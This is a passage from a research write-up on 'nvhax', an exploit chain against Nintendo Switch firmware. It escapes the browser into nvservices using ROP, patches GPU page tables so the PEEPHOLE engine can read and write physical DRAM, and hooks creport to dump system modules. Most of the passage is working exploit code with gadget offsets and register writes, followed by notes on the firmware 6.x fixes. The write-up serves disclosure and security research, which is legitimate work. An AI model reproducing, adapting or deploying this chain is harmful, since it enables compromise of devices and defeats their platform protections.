memcpy(tmp_buf_addr, src, size);
// Spawn a new object backed by the source data
var nvdrv_obj = this.spawn_nvdrv_srv(sm_handle, tmp_buf, tmp_buf_size);
var obj_srv_handle = nvdrv_obj[0];
var obj_nvdrv_buf = nvdrv_obj[1];
var obj_mem_addr = nvdrv_obj[2];
var obj_gpu_dev_handle = nvdrv_obj[3];
// Leak the new object's base address
var nvdrv_obj_base = this.leak_nvdrv_srv(sm_handle, 0x08, meminfo, pageinfo);
var nvdrv_buf = utils.add2(nvdrv_obj_base, 0x100000);
// Call nvservices memcpy
this.do_nvdrv_rop_call(0xBB1F4, [dst, nvdrv_buf, size], [], false);
// Release temporary object
this.destroy_nvdrv_srv(sm_handle, obj_srv_handle, obj_mem_addr, meminfo, pageinfo);
this.free(obj_mem_addr);
// Free memory
this.free(meminfo);
this.free(pageinfo);
}
sploitcore.prototype.do_nvdrv_memcpy_out = function(dst, src, size) {
var memcpy = this.bridge(0x44338C, types.int, types.void_p, types.void_p, types.int);
// Unwrap call context
var sm_handle = this.nvdrv_exp_ctx[0];
var tmp_buf = this.nvdrv_exp_ctx[8];
var tmp_buf_size = this.nvdrv_exp_ctx[9];
var meminfo = this.malloc(0x40);
var pageinfo = this.malloc(0x10);
// Spawn a new object backed by the source data
var nvdrv_obj = this.spawn_nvdrv_srv(sm_handle, tmp_buf, tmp_buf_size);
var obj_srv_handle = nvdrv_obj[0];
var obj_nvdrv_buf = nvdrv_obj[1];
var obj_mem_addr = nvdrv_obj[2];
var obj_gpu_dev_handle = nvdrv_obj[3];
// Leak the new object's base address
var nvdrv_obj_base = this.leak_nvdrv_srv(sm_handle, 0x08, meminfo, pageinfo);
var nvdrv_buf = utils.add2(nvdrv_obj_base, 0x100000);
// Call nvservices memcpy
this.do_nvdrv_rop_call(0xBB1F4, [nvdrv_buf, src, size], [], false);
// Release temporary object
this.destroy_nvdrv_srv(sm_handle, obj_srv_handle, obj_mem_addr, meminfo, pageinfo);
this.free(obj_mem_addr);
// Get temp buffer address
var tmp_buf_addr = utils.add2(tmp_buf, 0x100000);
// Copy out the data
memcpy(dst, tmp_buf_addr, size);
// Free memory
this.free(meminfo);
this.free(pageinfo);
}
sploitcore.prototype.do_nvdrv_rop_call = function(func_ptr, args, fargs, dump_regs) {
// Unwrap call context
var nvdrv_base = this.nvdrv_exp_ctx[1];
var rop_base = this.nvdrv_exp_ctx[6];
var call_obj = this.nvdrv_exp_ctx[7];
var tmp_buf = this.nvdrv_exp_ctx[8];
var tmp_buf_size = this.nvdrv_exp_ctx[9];
// Setup buffers
var rop_buf = utils.add2(rop_base, 0x80000);
var scratch_buf = utils.add2(rop_base, 0x30000);
if (typeof(func_ptr) == 'number')
func_ptr = utils.add2(nvdrv_base, func_ptr);
switch (arguments.length) {
case 1:
args = [];
case 2:
fargs = [];
case 3:
dump_regs = false;
}
var saddrs = {};
var scratch_offset = 0;
// Parse args
for (var i = 0; i < args.length; i++) {
if (typeof(args[i]) == 'number') {
args[i] = [args[i], 0];
} else if (ArrayBuffer.isView(args[i]) || args[i] instanceof ArrayBuffer) {
var size = args[i].byteLength;
var saddr = utils.add2(scratch_buf, scratch_offset);
this.do_nvdrv_memcpy_in(saddr, this.getArrayBufferAddr(args[i]), size);
saddrs[i] = saddr;
scratch_offset += size;
if (scratch_offset & 0x7)
scratch_offset = ((scratch_offset & 0xFFFFFFF8) + 8);
}
}
// Pointers
var vtable_save = utils.add2(rop_buf, 0x8000);
var load_buf = utils.add2(rop_buf, 0x9000);
var sp = utils.add2(rop_buf, 0x20000);
var save_buf = utils.add2(rop_buf, 0x6000);
// Gadgets
var save = utils.add2(nvdrv_base, 0xB2328);
var ldr_x0_ret = utils.add2(nvdrv_base, 0xC180C);
var load = utils.add2(nvdrv_base, 0xB4D74);
var br_x16 = utils.add2(nvdrv_base, 0x334);
var ldr_x19_ret = utils.add2(nvdrv_base, 0x7635C);
var store_branch_60 = utils.add2(nvdrv_base, 0x2E6CC);
// Write args
if (args.length > 0) {
for (var i = 0; i < 30 && i < args.length; i++) {
if (ArrayBuffer.isView(args[i]) || args[i] instanceof ArrayBuffer)
this.write_nvdrv_mem(utils.add2(load_buf, 8 * i), saddrs[i]);
else
this.write_nvdrv_mem(utils.add2(load_buf, 8 * i), args[i]);
}
}
// Write extra args
if (fargs.length > 0) {
for (var i = 0; i < fargs.length && i < 32; i++)
this.write_nvdrv_mem(utils.add2(load_buf, 0x110 + 8 * i), fargs[i]);
}
// Store main branch
this.write_nvdrv_mem(utils.add2(save_buf, 0x28), store_branch_60);
// Prepare vtable context
this.write_nvdrv_mem(save_buf, vtable_save);
this.write_nvdrv_mem(vtable_save, save);
this.write_nvdrv_mem(utils.add2(sp, 0x8), ldr_x0_ret);
sp = utils.add2(sp, 0x10);
// Save
this.write_nvdrv_mem(utils.add2(sp, 0x08), load_buf);
this.write_nvdrv_mem(utils.add2(sp, 0x18), load);
sp = utils.add2(sp, 0x20);
// Set up calling context
this.write_nvdrv_mem(utils.add2(sp, 0x08), ldr_x19_ret);
this.write_nvdrv_mem(utils.add2(load_buf, 0x80), func_ptr);
this.write_nvdrv_mem(utils.add2(load_buf, 0xF8), sp);
this.write_nvdrv_mem(utils.add2(load_buf, 0x100), br_x16);
sp = utils.add2(sp, 0x10);
// Unwrap call object
var srv_handle = call_obj[0];
var nvdrv_buf = call_obj[1];
var mem_addr = call_obj[2];
// Open random device to trigger ROP
this.nvdrv_open(nvdrv_buf, "/dev/random");
// Grab result buffer
var hax_buf = utils.add2(rop_buf, 0x10000);
// Read back result
var ret = this.read_nvdrv_mem(utils.add2(hax_buf, 0x10));
if (args.length > 0) {
for (var i = 0; i < 30 && i < args.length; i++) {
if (ArrayBuffer.isView(args[i]) || args[i] instanceof ArrayBuffer) {
var size = args[i].byteLength;
this.do_nvdrv_memcpy_out(this.getArrayBufferAddr(args[i]), saddrs[i], size);
}
}
}
return ret;
}
sploitcore.prototype.init_nvhax = function(sm_handle) {
// Get nvservices base address
var nvdrv_base = this.get_nvdrv_base(sm_handle);
// Save sm_handle and nvdrv_base
this.nvdrv_exp_ctx[0] = sm_handle;
this.nvdrv_exp_ctx[1] = nvdrv_base;
// Install read/write primitives
this.install_nvdrv_rw();
utils.log("RW primitives installed!");
// Build up the ROP chain
this.build_nvdrv_rop();
utils.log("ROP chain buffer built!");
// Build the ROP call object
var call_obj = this.build_nvdrv_call_obj();
utils.log("ROP call object built!");
// Allocate temporary buffer
var tmp_buf_size = 0x800000;
var tmp_buf = this.malloc(tmp_buf_size);
// Initialize call context
this.nvdrv_exp_ctx[7] = call_obj;
this.nvdrv_exp_ctx[8] = tmp_buf;
this.nvdrv_exp_ctx[9] = tmp_buf_size;
utils.log("nvservices base address: " + utils.paddr(nvdrv_base));
utils.log("nvservices test address: " + utils.paddr(utils.add2(this.nvdrv_exp_ctx[6], 0x40000)));
}
By combining mass memory allocations to manipulate the transfer memory's base address, some clever null-byte writes and object overlaps, we are now able to build very powerful read and write primitives over the transfer memory region and thus gain the ability to copy memory between the browser process and nvservices. Achieving ROP is now way easier and surprisingly stable, with the exploit chain working practically 9 out of 10 times.
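For reference, the two allocation loops in install_nvdrv_rw keep respawning services until the leaked [lo, hi] address pair satisfies a simple predicate; restated as standalone functions (a toy sketch mirroring the conditions in the code, not part of the exploit itself):

```javascript
// A sprayed 64MB transfer memory base is usable once its top byte is
// zero (so that later overwriting the top byte of a pointer with 00
// leaves it pointing where it already pointed) and the whole region
// still fits below the 4GB mark.
function malBaseUsable(base) {
    return base[1] === 0 && (base[0] >>> 0) <= 0xfc000000;
}

// An 8MB victim allocation is only useful if it lands inside the
// window carved out of the 64MB spray (same bounds as in the code).
function vicBaseOverlaps(base, malBase) {
    var lo = malBase[0] + 0x50000 - 0x10000;
    var hi = malBase[0] + 0x4000000 - 0x20000;
    return (base[0] >>> 0) >= lo && (base[0] >>> 0) < hi;
}
```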
By now, smhax had already been discovered, which is why nvdrv:t is being used in the code instead. However, this was purely experimental (to understand the different services' access levels) and is not a requirement; the exploit chain works without taking advantage of smhax or any other already-patched bugs.

We finally escaped the browser and have full control over nvservices, so what should we do next? How about taking the entire system down? ;)

The Aftermath


You may recall from gspwn (see https://www.3dbrew.org/wiki/3DS_System_Flaws#Standalone_Sysmodules) on the 3DS that GPUs are often a great place to look into when exploiting a system. Having this in mind from the beginning is what motivated me to attack nvservices in the first place and, fortunately for us, the Switch was no exception when it comes to the challenge of properly securing a GPU.
After SciresM's incredible work on maturing ROP for nvservices, I began looking into what could be done with the GM20B inside the Switch. A large amount of research took place over the following weeks, combining the publicly available Tegra source code and TRM with the envytools/nouveau project's code and my own reverse engineering of the nvservices system module. It was at this time that an incredibly enlightening quote from the Tegra X1's TRM was found:

[Excerpt from the Tegra X1 TRM]
If you watched the 34C3 Switch Security talk you probably remember this. If not, then I highly recommend at least re-reading the slides over here: https://switchbrew.github.io/34c3-slides/

I/O devices inside the Tegra X1's SoC are subject to what ARM calls the SMMU (System Memory Management Unit). The SMMU is simply a memory management unit that stands between a DMA-capable input/output bus and main memory. In the Tegra X1's and, consequently, the Switch's case, it is the SMMU that is responsible for translating accesses from the APB (Advanced Peripheral Bus) to the DRAM chips. Properly configuring the MC (Memory Controller) and locking the SMMU's page tables behind the kernel effectively prevents any peripheral device from accessing more memory than it should.
Side note: on firmware version 1.0.0 it was actually possible to access the MC's MMIO region and thus completely disable the SMMU. This attack was dubbed mchammer and was presented in the 34C3 Switch Security talk by plutoo, derrek and naehrwert.
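To make the SMMU's role concrete, here is a toy model of why a DMA-capable device normally only sees what the kernel has mapped for it (pure illustration with 4KB pages; real SMMU page table formats are far more involved):

```javascript
// Toy SMMU: translate a device-visible I/O virtual address (IOVA)
// through a kernel-owned page table that maps page numbers to page
// frame numbers. Unmapped pages fault (return null), which is what
// confines a peripheral to the memory the kernel gave it.
function smmuTranslate(pageTable, iova) {
    var vpn = iova >>> 12;               // 4KB page number
    if (!(vpn in pageTable))
        return null;                     // no mapping: translation fault
    return pageTable[vpn] * 0x1000 + (iova & 0xFFF);
}
```

The whole point of the attack that follows is that the GPU's own MMU does not have to go through a table like this one at all.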

So, we now know that the GPU has its own MMU (accordingly named GMMU) and that it is capable of bypassing the SMMU entirely. But how do we even access it?
There are many different ways to achieve this but, at the time and using the limited documentation available for the Maxwell GPU family, this is what I came up with:
  • Scan nvservices' memory space using svcQueryMemory and find all memory blocks with the attribute IsDeviceMapped set. Odds are that such a block is mapped to an I/O device and thus, potentially, the GPU.
  • Locate the 0xFACE magic inside these blocks. This magic word is used as a signature for GPU channels, so, if we find it, we've found a GPU channel structure.

sploitcore.prototype.nvhax_find_channel = function(hw_num) {
    var mem_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40000);
    var page_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40100);
    var test_addr = [0, 0];
    var ch_base_addr = [0, 0];
    
    // Look for user channel
    while (test_addr[1] < 0x80)
    {
        var result = this.nvhax_svc(0x06, [mem_info_addr, page_info_addr, test_addr], [], false);
        var mem_base_addr = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x00));
        var mem_size = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x08));
        var mem_type_attr = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x10));
        var mem_perm_ipc = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x18));
        var mem_dev_pad = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x20));
        var mem_type = mem_type_attr[0];
        var mem_attr = mem_type_attr[1];
        var mem_perm = mem_perm_ipc[0];
        var mem_ipc = mem_perm_ipc[1];
        var mem_dev = mem_dev_pad[0];
        var mem_pad = mem_dev_pad[1];
        
        // Only consider IsDeviceMapped blocks up to 0x10000 bytes
        if (((mem_attr & 0x04) == 0x04) && (mem_size[0] <= 0x10000))
        {
            var ch_sig = this.read_nvdrv_mem(utils.add2(mem_base_addr, 0x10));
            var ch_num = this.read_nvdrv_mem(utils.add2(mem_base_addr, 0xE8));
            if (ch_sig[0] == 0xFACE)
            {
                utils.log('Found channel 0x' + ch_num[0].toString(16) + ': ' + utils.paddr(mem_base_addr));
                if (ch_num[0] == hw_num)
                {
                    ch_base_addr = mem_base_addr;
                    break;
                }
            }
        }
        
        // Advance to the next block (64-bit addition with manual carry)
        var next_addr_lo = (((test_addr[0] + mem_size[0]) & 0xFFFFFFFF) >>> 0);
        var next_addr_hi = (((test_addr[1] + mem_size[1]) & 0x000000FF) >>> 0);
        if ((test_addr[0] + mem_size[0]) > 0xFFFFFFFF)
            next_addr_hi++;
        test_addr[0] = next_addr_lo;
        test_addr[1] = next_addr_hi;
    }
    return ch_base_addr;
}
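A quick aside on the [lo, hi] pairs used throughout this code: since JavaScript numbers can't safely hold full 64-bit integers, PegaSwitch represents 64-bit addresses as pairs of 32-bit words, which is also why the loop above propagates the carry by hand. An add2-style helper (sketched here for clarity; the real utils.add2 may differ in details) looks like this:

```javascript
// Sketch of a [lo, hi] 64-bit adder in the style of PegaSwitch's
// utils.add2; assumes the offset fits in 32 bits.
function add2(addr, off) {
    var lo = (addr[0] + off) >>> 0;                     // wrap to unsigned 32-bit
    var hi = (addr[1] + (lo < addr[0] ? 1 : 0)) >>> 0;  // propagate the carry
    return [lo, hi];
}

add2([0xFFFFFF00, 0x12], 0x200); // → [0x100, 0x13]
```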

  • Find the GPU channel's page table. Each GPU channel contains a page directory that we can traverse to locate and replace page table entries. Remember that these entries are used by the GMMU and not the SMMU, which means that not only do they follow a different format, but also that the addresses they translate are GPU virtual memory addresses.
  • Patch the GPU channel's page table entries with any memory address we want. The important part here is setting bit 31 in each page table entry, as this tells the GMMU to access physical memory directly instead of going through the SMMU as usual.

sploitcore.prototype.nvhax_patch_channel = function(ch_base_addr, target_paddr) {
    // Map GPU MMIO
    var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000);
    
    // Page directory is always at channel + 0x15000
    var pdb_vaddr = utils.add2(ch_base_addr, 0x15000);
    
    // Read page directory base IOVA
    var pdb_iova_lo = this.nvhax_read32(utils.add2(ch_base_addr, 0x200));
    var pdb_iova_hi = this.nvhax_read32(utils.add2(ch_base_addr, 0x204));
    var pdb_iova = ((pdb_iova_lo >> 0x08) | (pdb_iova_hi << 0x18));
    
    // Page table is always at pdb + 0x2000
    var ptb_vaddr = utils.add2(pdb_vaddr, 0x2000);
    
    // Read the first entry
    var pte_test = this.nvhax_read32(ptb_vaddr);
    
    // Encode the target physical address
    var pte_val = ((((target_paddr >> 0x08) & 0x00FFFFFF) >>> 0) | 0x01);
    
    // Replace the PTEs
    this.nvhax_write32(utils.add2(ptb_vaddr, 0x00), pte_val + 0x000);
    this.nvhax_write32(utils.add2(ptb_vaddr, 0x08), pte_val + 0x200);
    this.nvhax_write32(utils.add2(ptb_vaddr, 0x10), pte_val + 0x400);
    this.nvhax_write32(utils.add2(ptb_vaddr, 0x18), pte_val + 0x600);
    this.nvhax_write32(utils.add2(ptb_vaddr, 0x20), pte_val + 0x800);
    this.nvhax_write32(utils.add2(ptb_vaddr, 0x28), pte_val + 0xA00);
    this.nvhax_write32(utils.add2(ptb_vaddr, 0x30), pte_val + 0xC00);
    this.nvhax_write32(utils.add2(ptb_vaddr, 0x38), pte_val + 0xE00);
    
    // Poll fb_mmu_ctrl_r until there's space in the invalidate FIFO
    var mmu_ctrl_fifo_space = 0;
    while (!mmu_ctrl_fifo_space)
    {
        var mmu_ctrl_data = this.nvhax_read32(utils.add2(gpu_io_vaddr, 0x00100C80));
        mmu_ctrl_fifo_space = ((mmu_ctrl_data >> 0x10) & 0xFF);
    }
    
    // Write to fb_mmu_invalidate_pdb_r
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x00100CB8), pdb_iova);
    
    // Write to fb_mmu_invalidate_r
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x00100CBC), 0x80000001);
    
    // Poll fb_mmu_ctrl_r until the invalidate FIFO drains
    var mmu_ctrl_fifo_empty = 0;
    while (!mmu_ctrl_fifo_empty)
    {
        var mmu_ctrl_data = this.nvhax_read32(utils.add2(gpu_io_vaddr, 0x00100C80));
        mmu_ctrl_fifo_empty = ((mmu_ctrl_data >> 0x0F) & 0x01);
    }
    
    // Write to flush_l2_flush_dirty_r, then poll it until the
    // outstanding and pending bits clear
    var l2_flush_dirty_outstanding = 0;
    var l2_flush_dirty_pending = 0;
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x00070010), 0x01);
    do
    {
        var l2_flush_dirty_data = this.nvhax_read32(utils.add2(gpu_io_vaddr, 0x00070010));
        l2_flush_dirty_outstanding = ((l2_flush_dirty_data >> 0x01) & 0x01);
        l2_flush_dirty_pending = ((l2_flush_dirty_data >> 0x00) & 0x01);
    } while (l2_flush_dirty_outstanding || l2_flush_dirty_pending);
    
    // Write to flush_l2_system_invalidate_r, then poll it the same way
    var l2_system_invalidate_outstanding = 0;
    var l2_system_invalidate_pending = 0;
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x00070004), 0x01);
    do
    {
        var l2_system_invalidate_data = this.nvhax_read32(utils.add2(gpu_io_vaddr, 0x00070004));
        l2_system_invalidate_outstanding = ((l2_system_invalidate_data >> 0x01) & 0x01);
        l2_system_invalidate_pending = ((l2_system_invalidate_data >> 0x00) & 0x01);
    } while (l2_system_invalidate_outstanding || l2_system_invalidate_pending);
    
    // Calculate the channel's IOVA for PEEPHOLE
    var ch_iova = ((((pdb_iova - 0x200) >> 0x04) & 0x0FFFFFFF) >>> 0);
    return ch_iova;
}

  • Get the GPU to access our target memory address via the GMMU. I decided to use a rather obscure engine inside the GPU that envytools/nouveau calls the PEEPHOLE (see https://envytools.readthedocs.io/en/latest/hw/memory/peephole.html). This engine can be programmed by poking some GPU MMIO registers and provides a small, single-word window to read/write virtual memory covered by a particular GPU channel. Since we control the channel's page table and we've set bit 31 on each entry, any read or write going through the PEEPHOLE engine can access any DRAM address we want!

sploitcore.prototype.nvhax_peephole_dump_mem = function(ch_iova, gpu_va, mem_size) {
    // Map GPU MMIO
    var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000);
    // Write the channel's IOVA in the PEEPHOLE PBUS register
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x1718), (0x80000000 | ch_iova));
    // Write the GPU virtual address in the PEEPHOLE registers
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x6000C), gpu_va[1]);
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60010), gpu_va[0]);
    var mem_buf = this.malloc(mem_size);
    // Dump memory one word at a time through the data register
    for (var i = 0; i < (mem_size / 0x04); i++)
    {
        var val = this.nvhax_read32(utils.add2(gpu_io_vaddr, 0x60014));
        this.write4(val, mem_buf, i);
    }
    this.memdump(mem_buf, mem_size, "memdumps/dram.bin");
    this.free(mem_buf);
}

sploitcore.prototype.nvhax_peephole_read32 = function(gpu_io_vaddr, ch_iova, gpu_va) {
    // Write the channel's IOVA in the PEEPHOLE PBUS register
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x1718), (0x80000000 | ch_iova));
    // Write the GPU virtual address in the PEEPHOLE registers
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x6000C), gpu_va[1]);
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60010), gpu_va[0]);
    // Read out one word
    var mem_val = this.nvhax_read32(utils.add2(gpu_io_vaddr, 0x60014));
    return mem_val;
}

sploitcore.prototype.nvhax_peephole_write32 = function(gpu_io_vaddr, ch_iova, gpu_va, mem_val) {
    // Write the channel's IOVA in the PEEPHOLE PBUS register
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x1718), (0x80000000 | ch_iova));
    // Write the GPU virtual address in the PEEPHOLE registers
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x6000C), gpu_va[1]);
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60010), gpu_va[0]);
    // Write in one word
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60014), mem_val);
}
After all this, we now have a way to dump the entire DRAM... well, sort of.
An additional layer of protection is enforced at the MC level: memory carveouts. These are physical memory ranges that can be completely isolated from direct memory access.

Since I first implemented all this in firmware version 2.0.0, dumping the entire DRAM only gave me every non-built-in system module and applet that was loaded into memory. However, SciresM later tried it on 1.0.0 and realized we could dump the built-in system modules there!
Turns out, while the kernel has always been protected by a generalized memory carveout, the built-in system modules were loaded outside of this carveout in firmware 1.0.0.
Additionally, the kernel itself would start allocating memory outside of the carveout region if necessary. So, by exhausting some kernel resource (such as service handles) up to the point where kernel objects would start showing up outside of the carveout region, SciresM was able to corrupt an object and take over the kernel as well.
From that point on, we could use jamais vu (see https://www.reddit.com/r/SwitchHacks/comments/7rq0cu/jamais_vu_a_100_trustzone_code_execution_exploit/) to defeat the Secure Monitor and later use warmboothax to defeat the entire boot chain. But, that wasn't the end...

I wanted to reach the built-in system modules on recent firmware versions as well, so SciresM and I cooked up a plan:
  • Use smhax to load the creport system module in waiting state.
  • Use gmmuhax to find and patch creport directly in DRAM.
  • Launch a patched creport system module that would call svcDebugActiveProcess, svcGetDebugEvent and svcReadDebugProcessMemory with arguments controlled by us.
  • Use the debug SVCs to dump all running built-in system modules. 

sploitcore.prototype.nvhax_patch_creport = function(ch_base_addr, dram_addr, pid, mem_offset, mem_size) {
    var gpu_va = [0, 0x04];
    var dram_base_addr = (dram_addr & 0xFFF00000);
    var dram_offset = (dram_addr & 0x000F0000);
    
    // Map GPU MMIO
    var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000);
    
    // Patch the channel with the base DRAM address
    var ch_iova = this.nvhax_patch_channel(ch_base_addr, dram_base_addr);
    
    // Write target PID, memory size and offset somewhere
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x2A000), pid);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x2A008), 0);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x2A010), mem_size);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x2A018), mem_offset);
    
    // Replace "nnMain" branch
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x000D8), 0x9400595A);
    
    // Install svcDebugActiveProcess hook
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16640), 0x900000A4);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16644), 0xF9400081);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16648), 0xD4000C01);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1664C), 0x900000A4);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16650), 0xB9002080);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16654), 0xB9002481);
    
    // Install svcGetDebugEvent hook (process)
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16658), 0x900000A4);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1665C), 0x91010080);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16660), 0xB9402481);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16664), 0xD4000C61);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16668), 0x900000A4);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1666C), 0xB9003080);
    
    // Install svcGetDebugEvent hook (thread)
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16670), 0x900000A4);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16674), 0x91010080);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16678), 0xB9402481);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1667C), 0xD4000C61);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16680), 0x900000A4);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16684), 0xB9003080);
    
    // Install svcReadDebugProcessMemory hook
    if (mem_size == 0x4000)
    {
        this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16688), 0x90000064);
        this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1668C), 0x91100080);
    }
    else
    {
        this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16688), 0xF0000044);
        this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1668C), 0x91000080);
    }
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16690), 0x900000A4);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16694), 0xF9400C85);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16698), 0xF8424081);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1669C), 0xF9403082);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166A0), 0x8B050042);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166A4), 0xB9401083);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166A8), 0xD4000D41);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166AC), 0x900000A4);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166B0), 0xB9007080);
    
    // Return
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166B4), 0xD65F03C0);
    return [gpu_io_vaddr, ch_iova];
}
sploitcore.prototype.nvhax_dump_proc = function(sm_handle, ch_base_addr, pid, start_offset, end_offset, is_small) {
    var tmp_mem_buf = utils.add2(this.nvdrv_exp_ctx[6], 0x40000);
    var creport_tid = [0x00000036, 0x01000000];
    var creport_dram_addr = 0x94950000;
    var data_gpu_va = [0x71000, 0x4];
    var status_gpu_va = [0x7A000, 0x4];
    var mem_offset = start_offset;
    var mem_size = 0x8000;
    var mem_read_state = 0;
    
    // Use smaller blocks instead
    if (is_small)
    {
        data_gpu_va = [0x72400, 0x4];
        mem_size = 0x4000;
    }
    
    // Allocate memory buffer
    var mem_buf = this.malloc(mem_size);
    
    while (!mem_read_state && (mem_offset < end_offset))
    {
        // Launch creport in a waiting state
        var proc_pid = this.launch_proc(sm_handle, 0x03, creport_tid, "120", 0x02);
        
        // Patch creport
        var ctx_res = this.nvhax_patch_creport(ch_base_addr, creport_dram_addr, pid, mem_offset, mem_size);
        
        // Get context
        var gpu_io_vaddr = ctx_res[0];
        var ch_iova = ctx_res[1];
        
        // Start the patched creport
        this.start_proc(sm_handle, proc_pid);
        
        // Copy memory into nvservices
        this.nvhax_dram_memcpy(gpu_io_vaddr, ch_iova, data_gpu_va, tmp_mem_buf, mem_size);
        
        // Copy memory from nvservices
        this.do_nvdrv_memcpy_out(mem_buf, tmp_mem_buf, mem_size);
        
        // Dump memory
        this.memdump(mem_buf, mem_size, "memdumps/dram.bin");
        
        // Increase the source memory offset
        mem_offset += mem_size;
        
        // Check the debug SVC result
        mem_read_state = this.nvhax_peephole_read32(gpu_io_vaddr, ch_iova, utils.add2(status_gpu_va, 0x70));
    }
    this.free(mem_buf);
}
This worked for getting all built-in system modules (except boot, which only runs once and ends up overwritten in DRAM)! Naturally, we didn't know about nspwn back then so all this was moot.
However, firmware version 5.0.0 fixed nspwn and suddenly all this was relevant again. We had to work around the fact that smhax was no longer available, which required some very convoluted tricks using DRAM access to hijack other system modules.
To make matters worse, Switch units with new fuse patches for the well-known RCM exploit were being shipped, so the need for nvhax was now very real.

The Fixes


While the GMMU attack itself cannot be fixed (since it's a hardware flaw), some mitigations have been implemented, such as creating a separate memory pool for nvservices.

As for nvhax, all 3 bugs mentioned in this write-up have now been fixed in firmware versions 6.0.0 (Transfer Memory leak) and 6.2.0 (NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE and NVMAP_IOC_FREE bugs).

The fix for the Transfer Memory leak consists of simply tracking the address and size of the transfer memory region inside nvservices; every time a service handle is closed, the entire region is cleared before becoming available to the client again.

The NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE bug was fixed by changing its implementation to match every other ioctl command: have the command take "in-line" parameters instead of a memory pointer. The command now returns the 2 warpstate structs directly, and these are now also properly initialized.

As for the NVMAP_IOC_FREE bug, it now takes into account the case where the client doesn't supply its own memory and prevents nvservices' transfer memory pointer from being leaked back.

Conclusion


